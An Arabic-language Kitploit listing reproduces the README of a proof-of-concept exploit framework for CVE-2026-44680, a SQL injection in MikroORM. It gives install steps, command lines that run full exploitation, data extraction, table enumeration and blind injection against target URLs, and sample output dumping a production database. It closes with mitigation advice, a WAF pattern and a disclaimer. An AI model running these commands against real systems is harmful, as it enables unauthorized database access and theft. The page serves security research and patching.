Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — أداة PoC لثغرة CVE-2026-44680 التي تؤثر على MikroORM الإصدار 7.0.13 فما دون. تستغل حقن مسار JSON لاستخراج محتويات قاعدة البيانات عبر هجمات قائمة على UNION. تتميز باكتشاف الثغرات، واستخراج البيانات آليًا، وتعداد الجداول، ودعم الحقن الأعمى. تتضمن دعم التكامل مع بروكسي Burp Suite وتقنيات تجاوز WAF. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
أطر اختبار الاختراقماسحات الثغرات الأمنيةتحليل الكودالاستغلالأمن الويبأمن قواعد البيانات
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

عرض المستودع
120منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

أداة PoC لثغرة CVE-2026-44680 التي تؤثر على MikroORM الإصدار 7.0.13 فما دون. تستغل حقن مسار JSON لاستخراج محتويات قاعدة البيانات عبر هجمات قائمة على UNION. تتميز باكتشاف الثغرات، واستخراج البيانات آليًا، وتعداد الجداول، ودعم الحقن الأعمى. تتضمن دعم التكامل مع بروكسي Burp Suite وتقنيات تجاوز WAF.

مشاركة

CVE-2026-44680 - إطار عمل استغلال حقن SQL في MikroORM

Python Version License Status CVSS

أداة احترافية لإثبات المفهوم لباحثي الأمن


🔍 نظرة عامة

CVE-2026-44680 هي ثغرة حقن SQL حرجة تؤثر على MikroORM، وهي أداة ORM شائعة بلغة TypeScript لبيئة Node.js. يوفر إطار العمل هذا لباحثي الأمن ومختبري الاختراق أداة احترافية لاكتشاف الثغرة واستغلالها.

المؤلف: Sudeepa Wanigarathna
الإصدار: 1.0.0
التصنيف: أداة بحث أمني احترافية


🚨 تفاصيل الثغرة

الخاصيةالقيمة
معرّف CVECVE-2026-44680
درجة CVSS7.6 (عالية)
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الصلاحيات المطلوبةمنخفضة

النسخ المتأثرة

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

السبب الجذري

يفشل MikroORM في تهريب (escape) مفاتيح مسار JSON المتحكم بها وقت التشغيل بشكل صحيح عند بناء استعلامات JSON_EXTRACT. يمكن للمهاجمين الخروج من سياق مسار JSON وحقن كود SQL تعسفي.


✨ المميزات

الميزةالوصفالحالة
اكتشاف الثغرةاكتشاف قائم على الوقت وقائم على الأخطاء✅
استخراج قاعدة البياناتالإصدار، قاعدة البيانات، المستخدم، اسم المضيف✅
تعداد الجداولالاكتشاف التلقائي لجميع الجداول✅
الحقن القائم على UNIONاستخراج البيانات عبر UNION SELECT✅
الحقن الأعمىاستخراج الأحرف قائم على القيم المنطقية✅
دعم الوكيلBurp Suite / وكيل اعتراض✅
إنشاء التقاريرتقارير TXT احترافية✅
تجاوز WAFتقنيات إخفاء متقدمة✅

📦 التثبيت

المتطلبات الأساسية

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

خطوات التثبيت

الخطوة 1: استنساخ المستودع

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

الخطوة 2: تثبيت التبعيات

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

الخطوة 3: التحقق من التثبيت

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 بدء الاستخدام السريع

الاستخدام الأساسي

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 دليل الاستخدام

خيارات الأوامر

العلامةالوصفالافتراضي
-u, --urlعنوان الهدف (مطلوب)-
-e, --endpointنقطة نهاية API/api/users/search
-p, --proxyوكيل HTTPلا شيء
-v, --verboseمخرجات تفصيليةFalse
--detectاكتشاف الثغرة فقطFalse
--extractاستخراج معلومات قاعدة البياناتFalse
--enumerateتعداد الجداولFalse
--blindوضع الحقن الأعمىFalse

أمثلة على الأوامر

1. الاستغلال الكامل

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. نقطة نهاية مخصصة

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. مع وكيل (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. تصحيح أخطاء تفصيلي

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. الحقن الأعمى

root@kitploit:~
python exploit.py -u http://target.com --blind

6. الاكتشاف فقط

root@kitploit:~
python exploit.py -u http://target.com --detect

7. استخراج معلومات قاعدة البيانات

root@kitploit:~
python exploit.py -u http://target.com --extract

8. تعداد الجداول

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 أمثلة على المخرجات

مخرجات الطرفية

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

الملفات المُنشأة

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ التخفيف

إجراءات فورية

1. تحديث MikroORM

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. التحقق من المدخلات

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. قواعد WAF

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. تحصين قاعدة البيانات

  • تطبيق مبدأ الامتياز الأقل
  • استخدام مستخدمين منفصلين لقاعدة البيانات
  • تفعيل تسجيل الاستعلامات
  • تمكين كشف حقن SQL

⚠️ إخلاء مسؤولية

مهم: هذه الأداة مخصصة لاختبار الأمن المصرح به والأغراض التعليمية فقط.

إشعار قانوني

  • ✅ يجب أن يكون لديك إذن صريح قبل اختبار أي نظام
  • ✅ أنت مسؤول عن أي ضرر ناتج عن سوء الاستخدام
  • ✅ استخدمها بأخلاقية وأبلغ عن الثغرات بمسؤولية

إرشادات الاستخدام الأخلاقي

  1. التفويض: احصل على إذن كتابي من مالك النظام
  2. الإبلاغ: أبلغ البائعين المتأثرين بالنتائج بمسؤولية
  3. السرية: لا تفصح عن الثغرات حتى يتم إصلاحها
  4. القيود: التزم بنطاق الاختبار المصرح به

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 المراجع

  • تفاصيل CVE-2026-44680
  • استشارة أمنية من MikroORM
  • منع حقن SQL من OWASP

صُنع بـ ❤️ لمجتمع أبحاث الأمن

الإبلاغ عن خطأ • طلب ميزة • إضافة نجمة على GitHub

تنزيل الأداة